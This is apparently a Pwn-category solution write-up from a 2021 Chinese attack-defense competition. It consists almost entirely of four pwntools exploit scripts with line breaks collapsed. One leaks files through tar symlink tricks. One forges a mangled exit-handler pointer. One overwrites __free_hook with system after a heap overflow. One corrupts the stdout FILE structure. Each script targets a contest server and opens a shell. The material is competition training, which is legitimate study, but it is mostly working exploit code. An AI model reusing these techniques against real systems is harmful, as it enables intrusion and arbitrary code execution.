2021网络安全领军人才攻防大赛 ｜ Pwn方向WP

#coding:utf-8from pwn import *
se      = lambda data               :p.send(data) sa      = lambda delim,data         :p.sendafter(delim, data)sl      = lambda data               :p.sendline(data)sla     = lambda delim,data         :p.sendlineafter(delim, data)sea     = lambda delim,data         :p.sendafter(delim, data)rc      = lambda numb=4096          :p.recv(numb)ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)uu32    = lambda data               :u32(data.ljust(4, ''))uu64    = lambda data               :u64(data.ljust(8, ''))info_addr = lambda tag, addr        :p.info(tag + ': {:#x}'.format(addr))
if len(sys.argv)<3:    print 'usage: ./exp.py host port'    exit()elif len(sys.argv)==3:    p = remote(sys.argv[1],sys.argv[2])# context.log_level = 'debug'
def upload(data):    sla('> ','u')    sla('Content:',data)    ru('as /tmp/')    return rc(32)
def compress(filename, arcname):    sla('> ','c')    sla('Filename: /tmp/',filename)    sla('Rename archive file? [y/N]','y')    sla('Arcname: ',arcname)    ru('as ')    return rc(32)
def extract(filename):    sla('> ','x')    sla('Filename:',filename)
def readfile(filename):    sla('> ','r')    sla('Filename:',filename)    return ru('n')
def leak(filename):    f1 = upload('maxbos know the flag')    log.info('uploaded file: '+f1)
    c1 = compress(f1,'maxbos')   #生成软连接    log.info('compressed file: '+c1)    log.info('archive file name: '+'maxbos')
    # create soft link file     os.system('ln -s %s %s'%(filename, c1))     #创建上一个软链接    os.system('tar cvf payload.tar '+c1+' >/dev/null')    payload = open('payload.tar').read()
    f2 = upload(payload)   #上传压缩包    log.info('uploaded file '+f2)
    c2 = compress(f2, c1)     #为压缩包生成软连接为c1    log.info('compressed file: '+c2)    log.info('archive file name: '+c1)
    extract(c2)     #解压一次压缩包，c1指向tar包    log.info('extract '+c2+' --> '+c1)  #解压
    extract(c1)    #再次解压c1，就能直接解压出文件名    log.info('extract '+c1+' --> '+c1)
    log.info('readfile: '+c1)    data = readfile(c1)
    log.success('data:'+data)    return data
pid = leak('/proc/self/stat').split()[3]print pidflag = leak('/proc/%s/cwd/flag'%pid)# flag = leak('/ho\me/ctf/flag')print flag
p.close()

#!/usr/bin/python from pwn import *import sys#from LibcSearcher import LibcSearchercontext.log_level = 'debug'context.arch='amd64' local=0binary_name='2+1'libc_name='/lib/x86_64-linux-gnu/libc.so.6'if local:    p=process("./"+binary_name)    libc=ELF(libc_name)    #p = process(["qemu-arm", "-L", "/usr/arm-linux-gnueabihf", "./"+binary_name])    #p = process(argv=["./qemu-arm", "-L", "/usr/arm-linux-gnueabihf", "-g", "1234", "./"+binary_name])else:    p=remote('121.40.203.104',49525)    e=ELF("./"+binary_name)    libc=ELF(libc_name) def z(a=''):    if local:        gdb.attach(p,a)        if a=='':            raw_input    else:        passru=lambda x:p.recvuntil(x)sl=lambda x:p.sendline(x)sd=lambda x:p.send(x)sa=lambda a,b:p.sendafter(a,b)sla=lambda a,b:p.sendlineafter(a,b)ia=lambda :p.interactive()def leak_address():    if(context.arch=='i386'):        return u32(p.recv(4))    else :        return u64(p.recv(6).ljust(8,'x00'))def ROR(i,index):    tmp = bin(i)[2:].rjust(64,"0")    for _ in range(index):        tmp = tmp[-1] + tmp[:-1]    return int(tmp, 2) def ROL(i,index):    tmp = bin(i)[2:].rjust(64, "0")    for _ in range(index):        tmp = tmp[1:] + tmp[0]    return int(tmp, 2) ru('Gift: ')libc_base = int(p.recvline()[:-1],16)-libc.sym['alarm']print(hex(libc_base))ptr = libc_base+0x3c5c58print(hex(ptr))dl_fini=libc_base+0x3daaf0sa('where to read?:',p64(ptr))ru('data: ')encode_ptr = u64(p.recv(8))print(hex(encode_ptr)) dl_fini_1 = ROL(dl_fini,0x11)print(hex(dl_fini),hex(dl_fini_1))key = dl_fini_1 ^ encode_ptrprint(hex(key))  exit_funcs=libc_base+0x3c45f8system_addr = libc_base+libc.sym['system']binsh = libc_base+libc.search('/bin/sh').next()encode_system = key ^ ROL(system_addr,0x11)sa('where to write?:',p64(exit_funcs))print(hex(system_addr))# gdb.attach(p)sa('msg:',b'a'*0x8+p64(1)+p64(4)+p64(encode_system)+p64(binsh))ia()

#!/usr/bin/python from pwn import *import syscontext.log_level = 'debug'context.arch='amd64' local=0binary_name='pwn'libc_name='libc.so.6'if local:    p=process("./"+binary_name)    libc=ELF("./"+libc_name)else:    p=remote('121.40.203.104',45123)    e=ELF("./"+binary_name)    libc=ELF("./"+libc_name) ru=lambda x:p.recvuntil(x)sl=lambda x:p.sendline(x)sd=lambda x:p.send(x)sa=lambda a,b:p.sendafter(a,b)sla=lambda a,b:p.sendlineafter(a,b)ia=lambda :p.interactive()def leak_address():    if(context.arch=='i386'):        return u32(p.recv(4))    else :        return u64(p.recv(6).ljust(8,'x00')) def cho(num):    sla("choice:",str(num))def add():    cho(1)    sl('aaaaaaaa -> /bin/shx00bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb')    sl('ccccccccccccccccccc -> ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd')    sl('exit')def show():    cho(2)def gf():    cho(3)def edit(name,size,data):    cho(4)    sla("Non-Terminal:", name)    sla("size:",str(size))    sd(data) add()heap_rub = 'g'*0x18+p64(0x21)+p64(0)*3+p64(0x51)+'d'*0x40+p64(0)+p64(0x81)edit('c'*19,0x80000000,heap_rub+'x10')show()ru('Grammar:n')p.recv(2)heap_base = u64(p.recv(8))-0x250print(hex(heap_base))gf()edit('g'*19,0x80000000,heap_rub+p64(heap_base+0x600)+p64(0x400))show()libc_base = u64(p.recvuntil('x7fx00x00')[-8:].ljust(8, 'x00')) - 0x3c4ca8print(hex(libc_base))free_hook = libc_base+libc.sym['__free_hook']system = libc_base+libc.sym['system']edit('g'*19,0x80000000,heap_rub+p64(free_hook)+p64(8))a = 'x00'*8edit(a,0x8,p64(system))print(hex(system))show()ia()

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLfrom datadecode import decode64,hex2str,decode32context.log_level='debug'elfelf='./easy_easy'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch
    gdb_text='''      telescope $rebase(0x202040) 16      '''
    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :      clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')      io=remote('121.40.203.104',32233)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)
    def choice(a):      io.sendlineafter(': ',str(a))
    def add(a):      choice(1)      io.sendlineafter('size: ',str(a))      def edit(a,b,c):      choice(2)      io.sendlineafter('index: ',str(a))      io.sendlineafter('size: ',str(b))      io.sendafter('content:',c)
    def show(a):      choice(4)      io.sendlineafter('index: ',str(a))
    def delete(a):      choice(3)      io.sendlineafter('index: ',str(a))
    add(0xf8)    add(0xf8)    add(0xf8)    add(0xf8)    add(0xe8)    add(0xe8)    add(0xe8)    add(0xe8)    delete(1)    edit(0,0x108,'a'*0x108)    show(0)
    libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-88-0x10    libc.address=libc_base    bin_sh_addr=libc.search('/bin/shx00').next()    system_addr=libc.sym['system']    free_hook_addr=libc.sym['__free_hook']

    edit(0,0x200,'x00'*0xf8+p64(0x101)+p64(libc.sym['__malloc_hook']+0x10+88))
    delete(3)    edit(2,0x108,'a'*0x101)
    show(2)    io.recvuntil('a'*0x101)    heap_base=u64('x00'+io.recv(5)+'x00x00')    edit(2,0x208,'x00'*0xf8+p64(0x101)+'x00')        edit(0,0x208,'x00'*0xf8+p64(0x101)+p64(heap_base)+p64(free_hook_addr+0x40))    add(0xf8)    delete(5)    edit(4,0x208,'x00'*0xe8+p64(0xf1)+p64(libc.sym['_IO_2_1_stdout_']-0x51))        add(0xe8)    add(0xe8)

    edit(0,0x100,p64(system_addr)*0x20)
    from FILE import *    fake_file = IO_FILE_plus_struct()    fake_file._flags = 0    fake_file._IO_read_ptr=libc.sym['_IO_2_1_stdout_']+131    fake_file._IO_read_end=libc.sym['_IO_2_1_stdout_']+131    fake_file._IO_read_base=libc.sym['_IO_2_1_stdout_']+131    fake_file._IO_write_base=libc.sym['_IO_2_1_stdout_']+131    fake_file._IO_write_ptr=libc.sym['_IO_2_1_stdout_']+131    fake_file._IO_write_end=libc.sym['_IO_2_1_stdout_']+131    fake_file._IO_buf_base=libc.sym['_IO_2_1_stdout_']+131    fake_file._IO_buf_end=libc.sym['_IO_2_1_stdout_']+132    fake_file._mode=0    fake_file.vtable=heap_base-0x100    gdb_attach(io,gdb_text)    edit(5,0x300,'x00'*0x41+p32(0xfbad1887)+';shx00'+str(fake_file)[8:0x88]+p64(libc.sym['_IO_2_1_stdout_']+0x1160)+str(fake_file)[0x90:])
    
        success('libc_base:'+hex(libc_base))    success('heap_base:'+hex(heap_base))
        io.interactive()
  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue